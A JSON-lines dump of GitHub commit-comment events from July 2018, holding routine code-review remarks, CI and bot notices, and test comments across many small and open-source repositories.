{"id":"8008096028","type":"CommitCommentEvent","actor":{"login":"gabordemooij"},"repo":{"name":"brtdv/redbean"},"payload":{"comment":{"id":29809536,"position":null,"line":null,"path":null,"commit_id":"47bdbd038c4f6233381e07bab925a9a417efb895","created_at":"2018-07-24T06:30:09Z","updated_at":"2018-07-24T06:30:09Z","author_association":"NONE","body":"Can you send me this PR please?"}},"created_at":"2018-07-24T06:30:09Z"}
{"id":"8008097383","type":"CommitCommentEvent","actor":{"login":"onlookerliu"},"repo":{"name":"jcranky/scala99"},"payload":{"comment":{"id":29809541,"position":26,"line":26,"path":"src/main/scala/com/jcranky/scala99/problem-13.scala","commit_id":"e062665acd7ec8e235c626765bb689112635f7a8","created_at":"2018-07-24T06:30:30Z","updated_at":"2018-07-24T06:30:30Z","author_association":"NONE","body":"the rest list should be encodeDirectPhil(next), which leads to a recursive call"}},"created_at":"2018-07-24T06:30:30Z"}
{"id":"8008098344","type":"CommitCommentEvent","actor":{"login":"dastanabeuov"},"repo":{"name":"dastanabeuov/thinknetica"},"payload":{"comment":{"id":29809542,"position":44,"line":44,"path":"1-Osnovy-Ruby-polnaya-PO/lesson6/route.rb","commit_id":"be917a850a791abbdc4b9d0a3b87273425f0e297","created_at":"2018-07-24T06:30:44Z","updated_at":"2018-07-24T06:30:44Z","author_association":"OWNER","body":"proveryaet pravilnost argumenta(dolzhen byt nomer) ili argument yavlyaetca strokoi i vyvodit oshybku chto stroka ne mozhet byt argumentom..."}},"created_at":"2018-07-24T06:30:44Z"}
{"id":"8008098806","type":"CommitCommentEvent","actor":{"login":"paulphillips0"},"repo":{"name":"paulphillips0/ConsoleApp1"},"payload":{"comment":{"id":29809544,"position":16,"line":9,"path":"ConsoleApp1/Program.cs","commit_id":"24531e03c99f9602e1d550fe3b03f7c4385aa5d3","created_at":"2018-07-24T06:30:51Z","updated_at":"2018-07-24T06:30:51Z","author_association":"OWNER","body":"Using UTC time is more universal"}},"created_at":"2018-07-24T06:30:51Z"}
{"id":"8008100363","type":"CommitCommentEvent","actor":{"login":"fichtner"},"repo":{"name":"opnsense/ports"},"payload":{"comment":{"id":29809546,"position":null,"line":null,"path":null,"commit_id":"22e295b2dfe645bfc7590caaa4557db7032d890f","created_at":"2018-07-24T06:31:18Z","updated_at":"2018-07-24T06:31:18Z","author_association":"MEMBER","body":"@mimugmail for you ❤️ \r\n\r\nI still have to push rust support as  it offers new decoders."}},"created_at":"2018-07-24T06:31:18Z"}
{"id":"8008105189","type":"CommitCommentEvent","actor":{"login":"tatahy"},"repo":{"name":"tatahy/ipms"},"payload":{"comment":{"id":29809553,"position":null,"line":null,"path":null,"commit_id":"dcef6738043ec4204bee4b4fac17c682d2745615","created_at":"2018-07-24T06:32:40Z","updated_at":"2018-07-24T06:32:40Z","author_association":"OWNER","body":"well done."}},"created_at":"2018-07-24T06:32:40Z"}
{"id":"8008108490","type":"CommitCommentEvent","actor":{"login":"nanosoldier"},"repo":{"name":"JuliaLang/julia"},"payload":{"comment":{"id":29809566,"position":null,"line":null,"path":null,"commit_id":"9b88e46d70a4c29faec224248f431c388d031609","created_at":"2018-07-24T06:33:36Z","updated_at":"2018-07-24T06:33:36Z","author_association":"NONE","body":"[Your benchmark job](https://github.com/JuliaLang/julia/commit/9b88e46d70a4c29faec224248f431c388d031609#commitcomment-29808552) has completed - possible performance regressions were detected. A full report can be found [here](https://github.com/JuliaCI/BaseBenchmarkReports/blob/dce6f1e1c7468072dcbb12ba1c0913ddb06b52c8/daily_2018_7_24/report.md). cc @ararslan"}},"created_at":"2018-07-24T06:33:36Z"}
{"id":"8008109072","type":"CommitCommentEvent","actor":{"login":"broeker"},"repo":{"name":"electriccitizen/lawhelp"},"payload":{"comment":{"id":29809568,"position":null,"line":null,"path":null,"commit_id":"ffe3382de8715b3f0b3a3b5902f827204a8710a9","created_at":"2018-07-24T06:33:46Z","updated_at":"2018-07-24T06:33:46Z","author_association":"CONTRIBUTOR","body":"Created multidev environment [lawhelp#pr-order-sc](https://dashboard.pantheon.io/sites/9ec12d94-c804-44b7-968e-166a0b49fdc0#pr-order-sc).\n\n[![Visit Site](https://raw.githubusercontent.com/pantheon-systems/ci-drops-8/0.1.0/data/img/visit-site-36.png)](https://pr-order-sc-lawhelp.pantheonsite.io/)"}},"created_at":"2018-07-24T06:33:46Z"}
{"id":"8008110653","type":"CommitCommentEvent","actor":{"login":"SicariusNoctis"},"repo":{"name":"SicariusNoctis/eagle-eye-tracker"},"payload":{"comment":{"id":29809569,"position":86,"line":83,"path":"eagleeyetracker_rpi.py","commit_id":"7dafd92279643224b4f8e36eec20a49dd0e251a8","created_at":"2018-07-24T06:34:13Z","updated_at":"2018-07-24T06:34:13Z","author_association":"OWNER","body":"Expected behavior. If the motion controller runs fast enough (e.g. 256Hz), it's not a problem since the motors will stay near a 0 velocity anyways.\r\n\r\nBut a special damping term could be added into the motion controller to make it *appear* saner when near a 0 velocity already."}},"created_at":"2018-07-24T06:34:13Z"}
{"id":"8008126519","type":"CommitCommentEvent","actor":{"login":"conda-forge-linter"},"repo":{"name":"conda-forge/lyricsmaster-feedstock"},"payload":{"comment":{"id":29809601,"position":null,"line":null,"path":null,"commit_id":"a27023f8479726c56090c1cc007ef498d0e99894","created_at":"2018-07-24T06:38:32Z","updated_at":"2018-07-24T06:38:32Z","author_association":"NONE","body":"\nHi! This is the friendly automated conda-forge-webservice.\n\nI updated the Github team because of this commit.\n\n- @sekoud was added to this feedstock maintenance team.\n\nYou should get push access to this feedstock and CI services.\n\nFeel free to join the community [chat room](https://gitter.im/conda-forge/conda-forge.github.io).\n\nNOTE: Please make sure to not push to the repository directly.\n      Use branches in your fork for any changes and send a PR.\n      More details [here](https://conda-forge.org/docs/conda-forge_gotchas.html#using-a-fork-vs-a-branch-when-updating-a-recipe)\n"}},"created_at":"2018-07-24T06:38:32Z"}
{"id":"8008129181","type":"CommitCommentEvent","actor":{"login":"conda-forge-linter"},"repo":{"name":"conda-forge/tidynamics-feedstock"},"payload":{"comment":{"id":29809604,"position":null,"line":null,"path":null,"commit_id":"4539c45b459e47aba9df5949ffc1c5f00a5009c3","created_at":"2018-07-24T06:39:15Z","updated_at":"2018-07-24T06:39:15Z","author_association":"NONE","body":"\nHi! This is the friendly automated conda-forge-webservice.\n\nI updated the Github team because of this commit.\n\n- @pdebuyl was added to conda-forge. Welcome to conda-forge!\n  Go to https://github.com/orgs/conda-forge/invitation see your invitation.\n\nYou should get push access to this feedstock and CI services.\n\nFeel free to join the community [chat room](https://gitter.im/conda-forge/conda-forge.github.io).\n\nNOTE: Please make sure to not push to the repository directly.\n      Use branches in your fork for any changes and send a PR.\n      More details [here](https://conda-forge.org/docs/conda-forge_gotchas.html#using-a-fork-vs-a-branch-when-updating-a-recipe)\n"}},"created_at":"2018-07-24T06:39:15Z"}
{"id":"8008134894","type":"CommitCommentEvent","actor":{"login":"danijelGombac"},"repo":{"name":"opencart/opencart"},"payload":{"comment":{"id":29809616,"position":32,"line":386,"path":"upload/catalog/view/javascript/common.js","commit_id":"fd06704f935854ff191122fc3e5a98f3d9e47f40","created_at":"2018-07-24T06:40:48Z","updated_at":"2018-07-24T06:40:48Z","author_association":"CONTRIBUTOR","body":"@danielkerr \r\n\r\nI think ie10 and ie11 doesn't support ES6 classes.\r\n\r\nhttps://caniuse.com/#feat=es6-class"}},"created_at":"2018-07-24T06:40:48Z"}
{"id":"8008138724","type":"CommitCommentEvent","actor":{"login":"siggetest"},"repo":{"name":"siggetest/githubtest"},"payload":{"comment":{"id":29809623,"position":null,"line":null,"path":null,"commit_id":"effbf0cb0bd289925da79124c5b8e778a92736bc","created_at":"2018-07-24T06:41:52Z","updated_at":"2018-07-24T06:41:52Z","author_association":"OWNER","body":"# Specs execution successful\n:scroll: [View logs](http://bamboo.comnull)\n### Plans updated\n\nBamboo specs have been successfully imported and the following plans have been updated.\n\nProject | Plan | Build\n---|---|---\n[Test](http://bamboo.com/browse/TEST) | [Comment test](http://bamboo.com/browse/TEST-CTEST)  | :white_check_mark: [\\#1](http://bamboo.com/browse/TEST-CTEST-1)\n[New project](http://bamboo.com/browse/NEW) | [Disabled plan](http://bamboo.com/browse/NEW-DISABLED) **disabled** | :white_check_mark: [\\#1](http://bamboo.com/browse/NEW-DISABLED-1)\n\n### Deployments updated\n\nBamboo specs have been successfully imported and the following deployment projects have been updated.\n\n|Deployment project |\n----|\n[Deployment test](http://bamboo.com/deploy/viewDeploymentProjectVersions.action?id=2162689)|\n"}},"created_at":"2018-07-24T06:41:52Z"}
{"id":"8008138814","type":"CommitCommentEvent","actor":{"login":"MeiGuddet"},"repo":{"name":"berlinux2016/MIUI10"},"payload":{"comment":{"id":29809624,"position":null,"line":null,"path":null,"commit_id":"8a90cc19d6733142d60cca3c7720d22f65368eb0","created_at":"2018-07-24T06:41:53Z","updated_at":"2018-07-24T06:41:53Z","author_association":"COLLABORATOR","body":"👍 👍 👍 "}},"created_at":"2018-07-24T06:41:53Z"}
{"id":"8008140072","type":"CommitCommentEvent","actor":{"login":"zek"},"repo":{"name":"ebsuku/python3-qoqa"},"payload":{"comment":{"id":29809625,"position":null,"line":null,"path":null,"commit_id":"e88290c709c958efb89832611990ab45f1a124ea","created_at":"2018-07-24T06:42:14Z","updated_at":"2018-07-24T06:42:14Z","author_association":"NONE","body":"that causes qoqa env env3 fail "}},"created_at":"2018-07-24T06:42:14Z"}
{"id":"8008141523","type":"CommitCommentEvent","actor":{"login":"sliverc"},"repo":{"name":"django-json-api/django-rest-framework-json-api"},"payload":{"comment":{"id":29809628,"position":null,"line":null,"path":null,"commit_id":"e33df0a9ced47f35038f41b4f726aac999b2304b","created_at":"2018-07-24T06:42:35Z","updated_at":"2018-07-24T06:42:35Z","author_association":"MEMBER","body":"I guess if this is an issue at all it would need to be addressed in DRF directly. One can of course always overwrite OrderingFilter in its own project.\r\n\r\nHowever in many cases where I had to keep the api backwards compatible I was happy that the sort fields get ignored when not available."}},"created_at":"2018-07-24T06:42:35Z"}
{"id":"8008141902","type":"CommitCommentEvent","actor":{"login":"VladFiliucov"},"repo":{"name":"AlexSytUa/Study"},"payload":{"comment":{"id":29809630,"position":15,"line":15,"path":"Lesson2/calc_days.rb","commit_id":"5a68ec6f8685cb404d490890d26b72bb0428ee0a","created_at":"2018-07-24T06:42:42Z","updated_at":"2018-07-24T06:42:42Z","author_association":"NONE","body":"Рабочее решение. Для расширения кругозора:\r\nС руби 2.5 можно использовать метод sum\r\n```\r\ndays_arr.first(month - 1).sum(input_day)\r\n```\r\nЧуть легче читается на английском"}},"created_at":"2018-07-24T06:42:42Z"}
{"id":"8008143565","type":"CommitCommentEvent","actor":{"login":"SicariusNoctis"},"repo":{"name":"SicariusNoctis/eagle-eye-tracker"},"payload":{"comment":{"id":29809633,"position":86,"line":60,"path":"rpi/stepper.py","commit_id":"e50f44855d8867704da9a8bf83bb61e0788d6a56","created_at":"2018-07-24T06:43:09Z","updated_at":"2018-07-24T06:43:09Z","author_association":"OWNER","body":"Why 10.0?"}},"created_at":"2018-07-24T06:43:09Z"}
{"id":"8008144311","type":"CommitCommentEvent","actor":{"login":"SicariusNoctis"},"repo":{"name":"SicariusNoctis/eagle-eye-tracker"},"payload":{"comment":{"id":29809636,"position":84,"line":58,"path":"rpi/stepper.py","commit_id":"e50f44855d8867704da9a8bf83bb61e0788d6a56","created_at":"2018-07-24T06:43:21Z","updated_at":"2018-07-24T06:43:21Z","author_association":"OWNER","body":"What do states 0 and 1 mean?"}},"created_at":"2018-07-24T06:43:21Z"}
{"id":"8008147256","type":"CommitCommentEvent","actor":{"login":"meiluoy"},"repo":{"name":"meiluoy/meiluoy.github.io"},"payload":{"comment":{"id":29809641,"position":null,"line":null,"path":null,"commit_id":"1572ac3ff84a583810a1de6666dcb7b7e0c79ae3","created_at":"2018-07-24T06:44:06Z","updated_at":"2018-07-24T06:44:06Z","author_association":"OWNER","body":"uu"}},"created_at":"2018-07-24T06:44:06Z"}
{"id":"8008150157","type":"CommitCommentEvent","actor":{"login":"sadfool1"},"repo":{"name":"iride2020/iRide-Token"},"payload":{"comment":{"id":29809645,"position":null,"line":null,"path":null,"commit_id":"8f810b3700a24de0ee4f945ef84be7b2f1605610","created_at":"2018-07-24T06:44:50Z","updated_at":"2018-07-24T06:44:50Z","author_association":"NONE","body":"Great news! iRIDE.io will be listed in COINEX in 2months, SIGN UP AND TRADE\nON COINEX NOW! https://goo.gl/Swq1PT\n"}},"created_at":"2018-07-24T06:44:50Z"}
{"id":"8008153594","type":"CommitCommentEvent","actor":{"login":"dkruyt"},"repo":{"name":"cloudrkt/lxdbackup"},"payload":{"comment":{"id":29809660,"position":null,"line":null,"path":null,"commit_id":"11dec2ce046ca46328242429c791f2244de755df","created_at":"2018-07-24T06:45:44Z","updated_at":"2018-07-24T06:45:44Z","author_association":"NONE","body":"Should be reverted to support LXD 3.0"}},"created_at":"2018-07-24T06:45:44Z"}
{"id":"8008155527","type":"CommitCommentEvent","actor":{"login":"pathumego"},"repo":{"name":"akuru/akurucon.com"},"payload":{"comment":{"id":29809668,"position":9,"line":173,"path":"src/components/footer.js","commit_id":"bd95e9ab59a8db58909d7e8e45ddce5d1bc19e6c","created_at":"2018-07-24T06:46:15Z","updated_at":"2018-07-24T06:46:15Z","author_association":"MEMBER","body":"@enathu You can add the updated Tamil text here :)"}},"created_at":"2018-07-24T06:46:15Z"}
{"id":"8008155836","type":"CommitCommentEvent","actor":{"login":"VladFiliucov"},"repo":{"name":"AlexSytUa/Study"},"payload":{"comment":{"id":29809669,"position":15,"line":15,"path":"Lesson2/purchases_sum.rb","commit_id":"5a68ec6f8685cb404d490890d26b72bb0428ee0a","created_at":"2018-07-24T06:46:21Z","updated_at":"2018-07-24T06:46:21Z","author_association":"NONE","body":"inspect не нужен, так-как puts и так конвертирует в строку аргумент. Метод inspect под капотом просто вызывает to_s на ресивере."}},"created_at":"2018-07-24T06:46:21Z"}
{"id":"8008162186","type":"CommitCommentEvent","actor":{"login":"darkdh"},"repo":{"name":"brave/muon"},"payload":{"comment":{"id":29809679,"position":14,"line":1370,"path":"patches/master_patch.patch","commit_id":"3e3d703a710f6c9cb8b6636ab4a4e898ae5f0ef7","created_at":"2018-07-24T06:48:03Z","updated_at":"2018-07-24T06:48:03Z","author_association":"MEMBER","body":"This seems not necessary. Did you test general password confirm page? It is often seen in registration or password change page. We still need to prompt users to save/update password for that.\r\nThis function is mainly for special case like Trezor passphrase input form https://github.com/brave/browser-laptop/issues/12563#issuecomment-356392415"}},"created_at":"2018-07-24T06:48:03Z"}
{"id":"8008162514","type":"CommitCommentEvent","actor":{"login":"duraitrainings"},"repo":{"name":"duraitrainings/Test2"},"payload":{"comment":{"id":29809680,"position":null,"line":null,"path":null,"commit_id":"ca4f3266cd39ad232a61137a26810a9831bc8b27","created_at":"2018-07-24T06:48:09Z","updated_at":"2018-07-24T06:48:09Z","author_association":"OWNER","body":"Test 2"}},"created_at":"2018-07-24T06:48:09Z"}
{"id":"8008162704","type":"CommitCommentEvent","actor":{"login":"VladFiliucov"},"repo":{"name":"AlexSytUa/Study"},"payload":{"comment":{"id":29809681,"position":19,"line":19,"path":"Lesson2/purchases_sum.rb","commit_id":"5a68ec6f8685cb404d490890d26b72bb0428ee0a","created_at":"2018-07-24T06:48:12Z","updated_at":"2018-07-24T06:48:12Z","author_association":"NONE","body":"ТЗ : Также вывести итоговую сумму за каждый товар.\r\n\r\nНужно именно вывести."}},"created_at":"2018-07-24T06:48:12Z"}
{"id":"8008163934","type":"CommitCommentEvent","actor":{"login":"kkjayalal"},"repo":{"name":"kkjayalal/DevoJuly23"},"payload":{"comment":{"id":29809683,"position":null,"line":null,"path":null,"commit_id":"95bfffcfc57fc6d99eb482bb30f400fadc7135e6","created_at":"2018-07-24T06:48:32Z","updated_at":"2018-07-24T06:48:32Z","author_association":"OWNER","body":"this is 3rd time"}},"created_at":"2018-07-24T06:48:32Z"}
{"id":"8008165598","type":"CommitCommentEvent","actor":{"login":"Botan626"},"repo":{"name":"JustArchi/ArchiSteamFarm"},"payload":{"comment":{"id":29809687,"position":null,"line":null,"path":null,"commit_id":"62671beffce1746165183b13f82531ee7ec3ebf1","created_at":"2018-07-24T06:48:59Z","updated_at":"2018-07-24T06:48:59Z","author_association":"NONE","body":"Hello Mr. ASF developer.\r\n\r\nWhere do you live?"}},"created_at":"2018-07-24T06:48:59Z"}
{"id":"8008169151","type":"CommitCommentEvent","actor":{"login":"sutara79"},"repo":{"name":"sutara79/convert-mysql-to-sqlite"},"payload":{"comment":{"id":29809691,"position":null,"line":null,"path":null,"commit_id":"9dd516071a52d4eae5c2196576f06251193bc5db","created_at":"2018-07-24T06:49:54Z","updated_at":"2018-07-24T06:49:54Z","author_association":"OWNER","body":"@muhammaduhamza \r\nThank you for notifying me.\r\nThe web hosting service I have used seems to crashed.\r\nI uploaded to Heroku instead.\r\nhttps://sutara79-php.herokuapp.com/demo/convert-mysql-to-sqlite/"}},"created_at":"2018-07-24T06:49:54Z"}
{"id":"8008175933","type":"CommitCommentEvent","actor":{"login":"iArtNcku"},"repo":{"name":"iArtNcku/app_page"},"payload":{"comment":{"id":29809698,"position":null,"line":null,"path":null,"commit_id":"309ee9175e8d1ba2f8fb4f91be5ed762e5946593","created_at":"2018-07-24T06:51:36Z","updated_at":"2018-07-24T06:51:36Z","author_association":"OWNER","body":"app"}},"created_at":"2018-07-24T06:51:36Z"}
{"id":"8008176095","type":"CommitCommentEvent","actor":{"login":"SicariusNoctis"},"repo":{"name":"SicariusNoctis/eagle-eye-tracker"},"payload":{"comment":{"id":29809699,"position":null,"line":null,"path":null,"commit_id":"7dafd92279643224b4f8e36eec20a49dd0e251a8","created_at":"2018-07-24T06:51:38Z","updated_at":"2018-07-24T06:51:38Z","author_association":"OWNER","body":"I like this implementation -- neater and shorter. The `Queues` were probably a bad idea."}},"created_at":"2018-07-24T06:51:38Z"}
{"id":"8008177571","type":"CommitCommentEvent","actor":{"login":"jhchon"},"repo":{"name":"jhchon/test"},"payload":{"comment":{"id":29809704,"position":1,"line":1,"path":"asd.html","commit_id":"f90624c618db3076dffa0d55c230aff52c2254c4","created_at":"2018-07-24T06:52:00Z","updated_at":"2018-07-24T06:52:00Z","author_association":"OWNER","body":"asd\r\n"}},"created_at":"2018-07-24T06:52:00Z"}
{"id":"8008179164","type":"CommitCommentEvent","actor":{"login":"Shadowss"},"repo":{"name":"Shadowss/TravianZ"},"payload":{"comment":{"id":29809707,"position":null,"line":null,"path":null,"commit_id":"77136a97841afc7697db21e2c2606db86510bbab","created_at":"2018-07-24T06:52:24Z","updated_at":"2018-07-24T06:52:24Z","author_association":"OWNER","body":"I delete public from const in Artifacts.php in GameEngine folder and works.\r\n\r\nBut after i press Return To Natars in admin panel , all works ok but the name is not ok\r\n\r\n![zzzz](https://user-images.githubusercontent.com/1140613/43121640-1b452e9e-8f27-11e8-9022-bbd3efbae2c1.png)\r\n\r\nMust have the real name (WW Buildingplan)  or  Memoirs of Alexander the Great  or what name have the artifact before. It`s just an point of view"}},"created_at":"2018-07-24T06:52:24Z"}
{"id":"8008179797","type":"CommitCommentEvent","actor":{"login":"keilw"},"repo":{"name":"JavaMoney/jsr354-ri"},"payload":{"comment":{"id":29809708,"position":25,"line":92,"path":"moneta-convert/moneta-convert-imf/src/main/java/org/javamoney/moneta/convert/imf/IMFAbstractRateProvider.java","commit_id":"cd141d8f6b2d2fa63370549ce5c7f5fd5268c7d9","created_at":"2018-07-24T06:52:34Z","updated_at":"2018-07-24T06:52:34Z","author_association":"MEMBER","body":"Thanks, have you also fixed any of that in Moneta BP?"}},"created_at":"2018-07-24T06:52:34Z"}
{"id":"8008180204","type":"CommitCommentEvent","actor":{"login":"romkatv"},"repo":{"name":"romkatv/hcproxy"},"payload":{"comment":{"id":29809710,"position":14,"line":14,"path":"epoll.cc","commit_id":"0c52f01ff136f1897bdf0bfb691b4a6696759810","created_at":"2018-07-24T06:52:41Z","updated_at":"2018-07-24T06:52:41Z","author_association":"OWNER","body":"hcproxy never forks or execs, so it's not necessary. If it did, then indeed we would have to be diligent with making sure all file descriptors (not just the one from epoll_create) have O_CLOEXEC on them."}},"created_at":"2018-07-24T06:52:41Z"}
{"id":"8008187545","type":"CommitCommentEvent","actor":{"login":"Jessy1237"},"repo":{"name":"Jessy1237/DwarfCraft"},"payload":{"comment":{"id":29809727,"position":117,"line":100,"path":"src/com/Jessy1237/DwarfCraft/PlaceholderParser.java","commit_id":"8a65a7df773bacf5aebc6080fd94085616593be6","created_at":"2018-07-24T06:54:36Z","updated_at":"2018-07-24T06:54:36Z","author_association":"OWNER","body":"I think it has already been taken care of"}},"created_at":"2018-07-24T06:54:36Z"}
{"id":"8008189936","type":"CommitCommentEvent","actor":{"login":"MachinoNekomata"},"repo":{"name":"MinatsuT/PSoC5_USB_Keyboard"},"payload":{"comment":{"id":29809728,"position":null,"line":null,"path":null,"commit_id":"b858528e7adf5951f246221cba2e3d8b4be47625","created_at":"2018-07-24T06:55:11Z","updated_at":"2018-07-24T06:55:11Z","author_association":"NONE","body":"Minatsu様、ご連絡ありがとうございます。少し時間が経ちましたが、動かしてみました。状態としては、PSoC5 Prototyping KitのUSBコネクタにケーブルを挿してPCへ、そのPC上でメモ帳を動かしています（PCではHIDキーとして認識されています。WIn10 Prof.版です）。Rx_1,（P12(6)）Tx_1(P12(7))はクロスでAE-FT234X（秋月のUSB-RS変換器）で別のPCのTeraTermに接続、115200,8,none,1で接続しました。TeraTermを叩いてみましたが、メモ帳には変化が出ませんでした（残念）。何か、私の考えちがいがあるでしょうか？ご教授いただければ幸いです。\r\n\r\n"}},"created_at":"2018-07-24T06:55:11Z"}
{"id":"8008190219","type":"CommitCommentEvent","actor":{"login":"ZeroEpoch1969"},"repo":{"name":"TFPatches/TotalFreedomMod"},"payload":{"comment":{"id":29809729,"position":null,"line":null,"path":null,"commit_id":"31015be69f7de61e96a23dd1fba398c702acb9ee","created_at":"2018-07-24T06:55:15Z","updated_at":"2018-07-24T06:55:15Z","author_association":"MEMBER","body":"i fucking hate when i forget to pull"}},"created_at":"2018-07-24T06:55:15Z"}
{"id":"8008195418","type":"CommitCommentEvent","actor":{"login":"SicariusNoctis"},"repo":{"name":"SicariusNoctis/eagle-eye-tracker"},"payload":{"comment":{"id":29809732,"position":200,"line":93,"path":"rpi/stepper.py","commit_id":"e50f44855d8867704da9a8bf83bb61e0788d6a56","created_at":"2018-07-24T06:56:34Z","updated_at":"2018-07-24T06:56:34Z","author_association":"OWNER","body":"It's not really a problem logically or anything, but is the `write` necessary when direction hasn't changed? If this is blocking -- though I doubt it is -- you could ensure it's only called when direction changes. (If it's non-blocking, disregard this comment.)"}},"created_at":"2018-07-24T06:56:34Z"}
{"id":"8008199752","type":"CommitCommentEvent","actor":{"login":"AlexSytUa"},"repo":{"name":"AlexSytUa/Study"},"payload":{"comment":{"id":29809738,"position":15,"line":15,"path":"Lesson2/purchases_sum.rb","commit_id":"5a68ec6f8685cb404d490890d26b72bb0428ee0a","created_at":"2018-07-24T06:57:36Z","updated_at":"2018-07-24T06:57:36Z","author_association":"OWNER","body":"А там же выводится во вложенном хеше в ключе total?"}},"created_at":"2018-07-24T06:57:36Z"}
{"id":"8008201626","type":"CommitCommentEvent","actor":{"login":"elfring"},"repo":{"name":"adrianlopezroche/fdupes"},"payload":{"comment":{"id":29809744,"position":null,"line":null,"path":null,"commit_id":"c671a2bcf37d41f5d8b555c6f7c91cbb6595165e","created_at":"2018-07-24T06:58:03Z","updated_at":"2018-07-24T06:58:03Z","author_association":"NONE","body":"* How do you think about to reuse the exception handling code also from [the check for the function call “`malloc`”](https://github.com/adrianlopezroche/fdupes/blob/c671a2bcf37d41f5d8b555c6f7c91cbb6595165e/fdupes.c#L282 \"Duplicate source code in grokdir()\")?\r\n* Would [the exit code “`errno`”](https://en.wikipedia.org/wiki/Exit_status#C_language \"Selection of a program exit status\") be more appropriate at such places?"}},"created_at":"2018-07-24T06:58:03Z"}
{"id":"8008202261","type":"CommitCommentEvent","actor":{"login":"SicariusNoctis"},"repo":{"name":"SicariusNoctis/eagle-eye-tracker"},"payload":{"comment":{"id":29809746,"position":79,"line":76,"path":"eagleeyetracker_rpi.py","commit_id":"7dafd92279643224b4f8e36eec20a49dd0e251a8","created_at":"2018-07-24T06:58:12Z","updated_at":"2018-07-24T06:58:12Z","author_association":"OWNER","body":"Ah I wrote this really poorly in hindsight. Fixed in 7883bef21932d635949a2b9cbf2c57fa3e3e9c35."}},"created_at":"2018-07-24T06:58:12Z"}
{"id":"8008203100","type":"CommitCommentEvent","actor":{"login":"bealex"},"repo":{"name":"SvetlanaTs/how-much"},"payload":{"comment":{"id":29809747,"position":140,"line":93,"path":"HowMuch/Code/Presentation/Groups/ViewControllers/GroupListViewController.swift","commit_id":"af4d61a6858276d02801a70e6574b0d567a357a0","created_at":"2018-07-24T06:58:24Z","updated_at":"2018-07-24T06:58:24Z","author_association":"COLLABORATOR","body":"Да, это общее правило. Нужно задавать всё, чтобы можно было вычислить высоту. То же самое нужно обязательно делать с шириной, иначе, если повернуть на бок, ячейка не сможет перерасчитаться.\r\n"}},"created_at":"2018-07-24T06:58:24Z"}
{"id":"8008203965","type":"CommitCommentEvent","actor":{"login":"mynukeviet"},"repo":{"name":"huuthoqt1994/lynx"},"payload":{"comment":{"id":29809750,"position":29,"line":40,"path":"modules/email/funcs/main.php","commit_id":"dc1d83d18bd27ed556bdb1670717077450d109d0","created_at":"2018-07-24T06:58:37Z","updated_at":"2018-07-24T06:58:37Z","author_association":"NONE","body":"Dòng ni có vẻ thừa"}},"created_at":"2018-07-24T06:58:37Z"}
{"id":"8008204039","type":"CommitCommentEvent","actor":{"login":"AlexSytUa"},"repo":{"name":"AlexSytUa/Study"},"payload":{"comment":{"id":29809751,"position":19,"line":19,"path":"Lesson2/purchases_sum.rb","commit_id":"5a68ec6f8685cb404d490890d26b72bb0428ee0a","created_at":"2018-07-24T06:58:38Z","updated_at":"2018-07-24T06:58:38Z","author_association":"OWNER","body":"А там же выводится во вложенном хеше в ключе total? Надо как-то по другому?"}},"created_at":"2018-07-24T06:58:38Z"}
{"id":"8008205637","type":"CommitCommentEvent","actor":{"login":"mynukeviet"},"repo":{"name":"huuthoqt1994/lynx"},"payload":{"comment":{"id":29809754,"position":6,"line":307,"path":"modules/invoice/funcs/content.php","commit_id":"dc1d83d18bd27ed556bdb1670717077450d109d0","created_at":"2018-07-24T06:59:02Z","updated_at":"2018-07-24T06:59:02Z","author_association":"NONE","body":"Vẫn đang dùng biến `$admin_info`"}},"created_at":"2018-07-24T06:59:02Z"}
{"id":"8008207491","type":"CommitCommentEvent","actor":{"login":"mynukeviet"},"repo":{"name":"huuthoqt1994/lynx"},"payload":{"comment":{"id":29809756,"position":26,"line":38,"path":"modules/customer/funcs/main.php","commit_id":"dc1d83d18bd27ed556bdb1670717077450d109d0","created_at":"2018-07-24T06:59:31Z","updated_at":"2018-07-24T06:59:31Z","author_association":"NONE","body":"Thừa dòng ni"}},"created_at":"2018-07-24T06:59:31Z"}
{"id":"8008207579","type":"CommitCommentEvent","actor":{"login":"burhanndem"},"repo":{"name":"burhanndem/pycharm"},"payload":{"comment":{"id":29809757,"position":null,"line":null,"path":null,"commit_id":"e8a2a92733e8d671ee68a0a43299809d9627e604","created_at":"2018-07-24T06:59:32Z","updated_at":"2018-07-24T06:59:32Z","author_association":"OWNER","body":"git add ile klasör de commitlenebiliyormuş"}},"created_at":"2018-07-24T06:59:32Z"}
{"id":"8008208691","type":"CommitCommentEvent","actor":{"login":"mynukeviet"},"repo":{"name":"huuthoqt1994/lynx"},"payload":{"comment":{"id":29809760,"position":24,"line":131,"path":"modules/email/funcs/content.php","commit_id":"dc1d83d18bd27ed556bdb1670717077450d109d0","created_at":"2018-07-24T06:59:50Z","updated_at":"2018-07-24T06:59:50Z","author_association":"NONE","body":"Đang dùng `$admin_info`"}},"created_at":"2018-07-24T06:59:50Z"}
{"id":"8008211970","type":"CommitCommentEvent","actor":{"login":"snicolet"},"repo":{"name":"31m059/Stockfish"},"payload":{"comment":{"id":29809771,"position":null,"line":null,"path":null,"commit_id":"b7aa7b43bb975ee76b1b3a2ebc89dcaeff94d2e3","created_at":"2018-07-24T07:00:36Z","updated_at":"2018-07-24T07:00:36Z","author_association":"NONE","body":"I have put the test at priority -9\r\n\r\nPlease test against latest master. Thanks ! :-)"}},"created_at":"2018-07-24T07:00:36Z"}
{"id":"8008211992","type":"CommitCommentEvent","actor":{"login":"iandobbie"},"repo":{"name":"MicronOxford/cockpit"},"payload":{"comment":{"id":29809772,"position":null,"line":null,"path":null,"commit_id":"961a3cc643016700b444cc9749b7666060e6bf53","created_at":"2018-07-24T07:00:36Z","updated_at":"2018-07-24T07:00:36Z","author_association":"MEMBER","body":"Can someone try this on deepsim this week to see if it fixes the excitation wavelength issue? "}},"created_at":"2018-07-24T07:00:36Z"}
{"id":"8008212814","type":"CommitCommentEvent","actor":{"login":"mynukeviet"},"repo":{"name":"huuthoqt1994/lynx"},"payload":{"comment":{"id":29809776,"position":23,"line":35,"path":"modules/projects/funcs/main.php","commit_id":"dc1d83d18bd27ed556bdb1670717077450d109d0","created_at":"2018-07-24T07:00:49Z","updated_at":"2018-07-24T07:00:49Z","author_association":"NONE","body":"Không có biến khởi tạo `$array_name`"}},"created_at":"2018-07-24T07:00:49Z"}
